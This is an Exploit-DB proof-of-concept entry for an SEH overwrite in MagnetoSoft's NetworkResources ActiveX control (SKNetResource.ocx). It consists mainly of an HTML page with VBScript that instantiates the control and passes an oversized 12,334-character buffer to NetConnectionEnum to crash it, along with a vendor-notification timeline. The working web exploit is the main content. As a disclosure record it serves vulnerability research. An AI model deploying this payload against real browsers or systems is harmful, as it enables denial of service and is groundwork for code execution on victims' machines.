MagnetoSoft NetworkResources ActiveX NetConnectionEnum SEH Overwrite PoC

2010-04-13T00:00:00
ID EDB-ID:12208
Type exploitdb
Reporter s4squatch
Modified 2010-04-13T00:00:00

Description

MagnetoSoft NetworkResources ActiveX NetConnectionEnum SEH Overwrite POC. Dos exploit for windows platform

                                        
                                            <html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX NetConnectionEnum SEH Overwrite POC
'Discovered by:  s4squatch
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'www:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'Download:  http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'SKNetResource.ocx
'Function NetConnectionEnum ( ByVal strServerName As String ,  ByVal strQualifier As String ,  ByRef pvarNetConnectionInfo As Variant ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"

'SEH overwrite
buff = String(12334, "A")

arg1 = buff
arg2 = "defaultV"
arg3 = "defaultV"
target.NetConnectionEnum arg1 ,arg2 ,arg3 

</script>